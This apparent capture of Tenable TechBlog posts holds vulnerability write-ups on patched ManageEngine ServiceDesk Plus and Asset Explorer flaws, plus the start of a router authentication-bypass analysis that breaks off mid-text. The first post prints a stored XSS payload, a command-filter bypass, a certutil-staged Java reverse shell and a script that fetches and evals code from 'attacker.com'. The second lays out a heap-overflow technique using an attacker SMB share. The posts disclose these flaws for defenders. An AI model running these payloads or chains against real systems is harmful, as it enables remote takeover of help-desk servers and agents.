Normal view

There are new articles available, click to refresh the page.
Before yesterdayTenable TechBlog - Medium

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close
sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
return restrictedWords.split(",");
}
public Set containsScriptRestrictedWords(String input) throws Exception {
HashSet<String> input_words = new HashSet<String>();
input_words.addAll(Arrays.asList(input.split(" ")));
input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET","http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 07, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021–11 and TRA-2021–22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

3 August 2021 at 13:03

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, lets see if we can get around it. Searching for where it is referenced in Ghidra we can see that it is only called from another function process_request() which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of _dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

